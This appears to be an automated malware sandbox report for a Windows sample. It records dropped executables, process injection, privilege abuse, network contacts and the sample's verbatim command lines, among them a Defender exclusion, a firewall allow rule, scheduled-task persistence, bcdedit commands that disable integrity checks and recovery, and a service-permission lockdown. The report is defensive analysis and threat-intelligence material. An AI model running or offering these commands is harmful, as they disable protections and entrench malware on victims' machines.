N/A N/A C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u26o.0.exe N/A
N/A N/A C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
N/A N/A C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
N/A N/A C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
N/A N/A C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
N/A N/A C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
N/A N/A C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe N/A
N/A N/A C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe N/A
N/A N/A C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe N/A
N/A N/A C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe N/A
N/A N/A C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe N/A
N/A N/A C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe N/A
N/A N/A C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe N/A
N/A N/A C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe N/A
N/A N/A C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe N/A
N/A N/A C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe N/A
N/A N/A C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe N/A
N/A N/A C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe N/A
N/A N/A C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe N/A
N/A N/A C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe N/A
N/A N/A C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2220 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2220 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2220 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2220 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 2220 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 2220 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 2220 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 2220 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 2220 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 2220 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 2220 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 2220 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
PID 2220 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\system32\WerFault.exe
PID 2220 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\system32\WerFault.exe
PID 2220 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe C:\Windows\system32\WerFault.exe
PID 2572 wrote to memory of 2832 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\43h0dr9a9tbyx7RO1lNQLEny.exe
PID 2572 wrote to memory of 2832 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\43h0dr9a9tbyx7RO1lNQLEny.exe
PID 2572 wrote to memory of 2832 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\43h0dr9a9tbyx7RO1lNQLEny.exe
PID 2572 wrote to memory of 2832 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\43h0dr9a9tbyx7RO1lNQLEny.exe
PID 2572 wrote to memory of 856 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\beDDjjTIDeI98VjRRBBHYRkc.exe
PID 2572 wrote to memory of 856 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\beDDjjTIDeI98VjRRBBHYRkc.exe
PID 2572 wrote to memory of 856 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\beDDjjTIDeI98VjRRBBHYRkc.exe
PID 2572 wrote to memory of 856 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\beDDjjTIDeI98VjRRBBHYRkc.exe
PID 2572 wrote to memory of 1824 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe
PID 2572 wrote to memory of 1824 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe
PID 2572 wrote to memory of 1824 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe
PID 2572 wrote to memory of 1824 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe
PID 2572 wrote to memory of 2204 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe
PID 2572 wrote to memory of 2204 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe
PID 2572 wrote to memory of 2204 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe
PID 2572 wrote to memory of 2204 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe
PID 2572 wrote to memory of 980 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe
PID 2572 wrote to memory of 980 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe
PID 2572 wrote to memory of 980 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe
PID 2572 wrote to memory of 980 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe
PID 2572 wrote to memory of 2484 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe
PID 2572 wrote to memory of 2484 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe
PID 2572 wrote to memory of 2484 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe
PID 2572 wrote to memory of 2484 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe
PID 2832 wrote to memory of 2140 N/A C:\Users\Admin\Pictures\43h0dr9a9tbyx7RO1lNQLEny.exe C:\Users\Admin\AppData\Local\Temp\u26o.0.exe
PID 2832 wrote to memory of 2140 N/A C:\Users\Admin\Pictures\43h0dr9a9tbyx7RO1lNQLEny.exe C:\Users\Admin\AppData\Local\Temp\u26o.0.exe
PID 2832 wrote to memory of 2140 N/A C:\Users\Admin\Pictures\43h0dr9a9tbyx7RO1lNQLEny.exe C:\Users\Admin\AppData\Local\Temp\u26o.0.exe
PID 2832 wrote to memory of 2140 N/A C:\Users\Admin\Pictures\43h0dr9a9tbyx7RO1lNQLEny.exe C:\Users\Admin\AppData\Local\Temp\u26o.0.exe
PID 2832 wrote to memory of 908 N/A C:\Users\Admin\Pictures\43h0dr9a9tbyx7RO1lNQLEny.exe C:\Users\Admin\AppData\Local\Temp\u26o.1.exe
PID 2832 wrote to memory of 908 N/A C:\Users\Admin\Pictures\43h0dr9a9tbyx7RO1lNQLEny.exe C:\Users\Admin\AppData\Local\Temp\u26o.1.exe
PID 2832 wrote to memory of 908 N/A C:\Users\Admin\Pictures\43h0dr9a9tbyx7RO1lNQLEny.exe C:\Users\Admin\AppData\Local\Temp\u26o.1.exe
PID 2832 wrote to memory of 908 N/A C:\Users\Admin\Pictures\43h0dr9a9tbyx7RO1lNQLEny.exe C:\Users\Admin\AppData\Local\Temp\u26o.1.exe
PID 2192 wrote to memory of 2092 N/A C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe C:\Windows\system32\cmd.exe
PID 2192 wrote to memory of 2092 N/A C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe C:\Windows\system32\cmd.exe
PID 2192 wrote to memory of 2092 N/A C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe C:\Windows\system32\cmd.exe
PID 2192 wrote to memory of 2092 N/A C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe C:\Windows\system32\cmd.exe
PID 1972 wrote to memory of 2640 N/A C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe C:\Windows\system32\cmd.exe
PID 1972 wrote to memory of 2640 N/A C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe C:\Windows\system32\cmd.exe
PID 1972 wrote to memory of 2640 N/A C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe C:\Windows\system32\cmd.exe
PID 1972 wrote to memory of 2640 N/A C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe C:\Windows\system32\cmd.exe
PID 2092 wrote to memory of 2536 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2092 wrote to memory of 2536 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2092 wrote to memory of 2536 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2680 wrote to memory of 572 N/A C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe C:\Windows\system32\cmd.exe
PID 2680 wrote to memory of 572 N/A C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe C:\Windows\system32\cmd.exe
PID 2680 wrote to memory of 572 N/A C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe C:\Windows\system32\cmd.exe
PID 2680 wrote to memory of 572 N/A C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe C:\Windows\system32\cmd.exe
PID 572 wrote to memory of 2128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 572 wrote to memory of 2128 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe

"C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\d6078bbecc15a333c6171debc4488498.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2220 -s 808

C:\Users\Admin\Pictures\43h0dr9a9tbyx7RO1lNQLEny.exe

"C:\Users\Admin\Pictures\43h0dr9a9tbyx7RO1lNQLEny.exe"

C:\Users\Admin\Pictures\beDDjjTIDeI98VjRRBBHYRkc.exe

"C:\Users\Admin\Pictures\beDDjjTIDeI98VjRRBBHYRkc.exe"

C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe

"C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe"

C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe

"C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe"

C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe

"C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe"

C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe

"C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe"

C:\Users\Admin\AppData\Local\Temp\u26o.0.exe

"C:\Users\Admin\AppData\Local\Temp\u26o.0.exe"

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240510040523.log C:\Windows\Logs\CBS\CbsPersist_20240510040523.cab

C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe

"C:\Users\Admin\Pictures\uTsEd5zaWAwTh2I5zhyQgn96.exe"

C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe

"C:\Users\Admin\Pictures\Sumv9e2zZTPfbr2KJrMWLNxW.exe"

C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe

"C:\Users\Admin\Pictures\00fKWSRoAerNWHLuZOUwTWLf.exe"

C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe

"C:\Users\Admin\Pictures\dSRtB270COtELwP0avgpGVnT.exe"

C:\Users\Admin\AppData\Local\Temp\u26o.1.exe

"C:\Users\Admin\AppData\Local\Temp\u26o.1.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe

"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 yip.su udp
US 104.20.3.235:443 pastebin.com tcp
US 104.21.79.77:443 yip.su tcp
US 8.8.8.8:53 onlycitylink.com udp
US 8.8.8.8:53 realdeepai.org udp
US 8.8.8.8:53 avgmc.xyz udp
DE 185.172.128.59:80 185.172.128.59 tcp
RU 193.233.132.234:80 tcp
US 8.8.8.8:53 onlycitylink.com udp
RU 5.42.96.64:80 5.42.96.64 tcp
RU 193.233.132.234:80 tcp
US 8.8.8.8:53 realdeepai.org udp
US 104.21.90.14:443 realdeepai.org tcp
US 104.21.90.14:443 realdeepai.org tcp
US 172.67.182.192:443 onlycitylink.com tcp
US 172.67.182.192:443 onlycitylink.com tcp
RU 84.38.181.36:443 avgmc.xyz tcp
US 8.8.8.8:53 jonathantwo.com udp
US 8.8.8.8:53 jonathantwo.com udp
US 8.8.8.8:53 firstfirecar.com udp
US 8.8.8.8:53 firstfirecar.com udp
US 172.67.176.131:443 jonathantwo.com tcp
US 172.67.176.131:443 jonathantwo.com tcp
US 172.67.193.220:443 firstfirecar.com tcp
US 172.67.193.220:443 firstfirecar.com tcp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 2.18.190.81:80 apps.identrust.com tcp
US 2.18.190.80:80 apps.identrust.com tcp
US 2.18.190.80:80 apps.identrust.com tcp
US 2.18.190.81:80 apps.identrust.com tcp
DE 185.172.128.90:80 185.172.128.90 tcp
DE 185.172.128.228:80 185.172.128.228 tcp
GB 85.192.56.26:80 85.192.56.26 tcp
DE 185.172.128.59:80 185.172.128.59 tcp
DE 185.172.128.228:80 185.172.128.228 tcp
DE 185.172.128.150:80 185.172.128.150 tcp
US 8.8.8.8:53 api.myip.com udp
US 104.26.9.59:443 api.myip.com tcp
US 8.8.8.8:53 svc.iolo.com udp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 iplogger.com udp
US 172.67.188.178:443 iplogger.com tcp
US 8.8.8.8:53 download.iolo.net udp
US 8.8.8.8:53 a912424b-6149-45a7-bac9-5464d651c4d0.uuid.theupdatetime.org udp
FR 185.93.2.244:80 download.iolo.net tcp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 20.157.87.45:80 svc.iolo.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 20.150.79.68:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
